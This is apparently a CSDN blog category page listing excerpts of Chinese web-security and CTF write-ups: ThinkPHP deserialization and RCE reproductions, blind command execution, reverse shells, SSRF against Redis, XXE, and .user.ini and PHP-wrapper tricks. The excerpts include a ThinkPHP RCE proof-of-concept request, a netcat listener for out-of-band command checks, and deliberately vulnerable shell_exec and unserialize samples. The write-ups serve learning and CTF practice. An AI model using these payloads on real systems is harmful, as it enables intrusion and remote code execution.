![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Web安全
文章平均质量分 83
Snakin_ya
苍山负雪,明烛天南
展开
-
浅谈XS-Leaks之Timeless timing attck
本文首发于先知社区,转载请联系对方原文链接:浅谈XS-Leaks之Timeless timing attck文章目录1 XS-Leaks简介1 什么是XS-Leaks?2 XS-Leaks和CSRF的区别3 XS-Leaks的利用原理和使用条件2 网络计时攻击-network timing1 传统的计时攻击2 Timeless timing1 原理2 优点3 题目讲解简单示例[WCTF 2020]Spaceless SpacingHTTP/2的多路复用[TQLCTF 2022] A More Secur原创 2022-05-11 23:53:27 · 719 阅读 · 0 评论 -
[PHP]浅谈php混淆与反混淆
PHP编译PHP是解析型高级语言,事实上从Zend内核的角度来看PHP就是一个普通的C程序,它有main函数,我们写的PHP代码是这个程序的输入,然后经过内核的处理输出结果,内核将PHP代码"翻译"为C程序可识别的过程就是PHP的编译。C程序在编译时将一行行代码编译为机器码,每一个操作都认为是一条机器指令,这些指令写入到编译后的二进制程序中,执行的时候将二进制程序load进相应的内存区域(常量区、数据区、代码区)、分配运行栈,然后从代码区起始位置开始执行,这是C程序编译、执行的简单过程。同样,PHP的原创 2022-03-11 09:49:26 · 4043 阅读 · 0 评论 -
Thinkphp6.0.x反序列化分析
影响版本Thinkphp6.0.0~6.0.2环境搭建Phpstudy:OS: WindowsPHP: 7.3.4ThinkPHP: 6.0.1创建测试环境:composer create-projec topthink/think:6.0.* tp6.0.1之后进入composer.json修改"topthink/framework": "6.0.1",再执行composer update创建入口点:app/controller/Index.php<?phpnames原创 2022-02-24 01:01:33 · 1095 阅读 · 0 评论 -
[CTF]命令执行无回显利用
背景exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果<?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?>判断命令是否执行延时利用sleep函数cmd=ls|sleep 5HTTP请求目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求)VPS:nc -lvp 8888目标主机:cm原创 2022-02-21 01:42:54 · 7517 阅读 · 0 评论 -
[CTF]proc目录的应用
proc目录的运用/proc目录Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc 是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。简单来讲,/proc 目录即保存在系统内存中的信息,大多数虚拟文件可以使用文件查看命令如cat、more或者less进行查看,有些文件信息表述的内容可以一目了然,但也有文原创 2022-01-24 00:50:59 · 2235 阅读 · 0 评论 -
ctfshow—Node.js漏洞总结
1 Js大小写绕过ctfshow web334下载源码var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; });};需要以账户ctfshow,密码123456登录原创 2021-12-27 10:44:04 · 3714 阅读 · 0 评论 -
Thinkphp5 文件包含漏洞复现分析
漏洞概要漏洞存在于 ThinkPHP模板引擎中,在加载模版解析变量时存在变量覆盖问题,而且程序没有对数据进行很好的过滤,最终导致文件包含漏洞 的产生。影响版本5.0.0 <= Thinkphp <= 5.0.185.1.0 <= ThinkPHP <= 5.1.10环境搭建Phpstudy:OS: WindowsPHP: 7.3.4ThinkPHP: 5.0.18创建测试环境:composer create-project topthink/think=5.原创 2021-12-01 12:04:11 · 4216 阅读 · 0 评论 -
Thinkphp5.0.0~5.0.23 RCE漏洞复现分析
漏洞概要漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致 远程代码执行漏洞 的产生。环境搭建:Phpstudy:OS: WindowsPHP: 7.3.4ThinkPHP: 5.0.22POChttp://xxxxxx.xxx/public/?s=captchaBody_method=__construct&filter[]=system&method=get&get.原创 2021-11-19 10:43:52 · 6158 阅读 · 0 评论 -
Thinkphp3.2.3反序列化漏洞复现分析
环境搭建Phpstudy:OS: WindowsPHP: 5.6.9ThinkPHP: 3.2.3控制器写入:/Application/Home/Controller/IndexController.class.phppublic function index(){ unserialize(base64_decode($_GET[1]));//加上这一句}pop链分析先从__destruct方法入手,全局搜索路径:ThinkPHP/Library/Think/Image.原创 2021-11-13 11:49:08 · 939 阅读 · 0 评论 -
[CTF]反弹shell总结
1 什么是反弹shellreverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。2 为什么要反弹shell正向连接假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。原创 2021-11-11 15:40:21 · 4327 阅读 · 1 评论 -
SSRF攻击Redis
Redis简介Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p原创 2021-10-27 21:52:02 · 1365 阅读 · 0 评论 -
PHP—MD5和sha1绕过
1 数组绕过对于php强比较和弱比较:md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。<?php$a=$_GET['a'];$b=$_GET['b'];if ($a!==$b && md5($a)===md5($b)){ return "hahaha";}使用:?a[]=1&b[]=22 0e绕过弱比较对于某些特殊的字符串加密后得到的密文以0e开头,PHP会当作科原创 2021-10-26 15:53:05 · 7184 阅读 · 0 评论 -
ctfshow—XXE
XXEXXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。XXE可导致读取任意文件,探测内网端口,攻击内网网站,发起拒绝服务攻击,执行系统命令等。Java中的XXE支持sun.net.www.p原创 2021-10-24 17:59:41 · 987 阅读 · 0 评论 -
[文件上传]浅析.user.ini的利用
.user.iniphp.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。实例php 配置项中有两个配置可以起到一些作用auto_prepend_file = <filename> //包含在文件头auto_append_file = <filename> //包含在文件尾原创 2021-10-16 00:49:26 · 6923 阅读 · 2 评论 -
PHP伪协议详解
PHP伪协议详解php支持的伪协议1 file:// — 访问本地文件系统2 http:// — 访问 HTTP(s) 网址3 ftp:// — 访问 FTP(s) URLs4 php:// — 访问各个输入/输出流(I/O streams)5 zlib:// — 压缩流6 data:// — 数据(RFC 2397)7 glob:// — 查找匹配的文件路径模式8 phar:// — PHP 归档9 ssh2:// — Secure Shell 210 rar:// — RAR11原创 2021-10-11 01:08:07 · 36149 阅读 · 3 评论 -
从一道题学习LD_PRELOAD & putenv()
[极客大挑战 2019]RCE ME题目分析<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");原创 2021-10-09 13:19:12 · 657 阅读 · 0 评论 -
yii反序列化漏洞复现及利用
yii反序列化漏洞Yii框架Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。Yii 当前有两个主要版本:1.1 和 2.0。 1.1 版是上代的老版本,现在处于维护状态。 2.0 版是一个完全重写的版本,采用了最新的技术和协议原创 2021-10-05 12:30:39 · 4465 阅读 · 0 评论 -
php反序列化—POP 链的构造利用
POP 链的构造利用一、POP链简介1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg原创 2021-09-14 22:06:09 · 2097 阅读 · 0 评论 -
无参数文件读取
无参数文件读取什么是无参数?顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;使用的函数规定必须参数为空或者为一个参数等。举个例子:a(b(c()));可以使用,但是a(‘b’)或者a(‘b’,‘c’)这种含有参数的都不能使用所以我们要使用无参数的函数进行文件读取或者命令执行。首先,print_r(scandir(’.’))可以用于可以用来查看当前目录所有文件名。那么要做到无参数,就要构造替代 ‘.’ 。常见方法:locale原创 2021-09-14 22:04:17 · 263 阅读 · 0 评论 -
命令执行漏洞的利用以及绕过方式
命令执行漏洞的利用以及绕过方式1 preg_match()函数preg_match 函数用于执行一个正则表达式匹配。int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] )参数说明$pattern要搜索的模式,字符串形式$subject要搜索检测的目标字符串$matches如果提供了参数原创 2021-09-14 21:52:38 · 1924 阅读 · 0 评论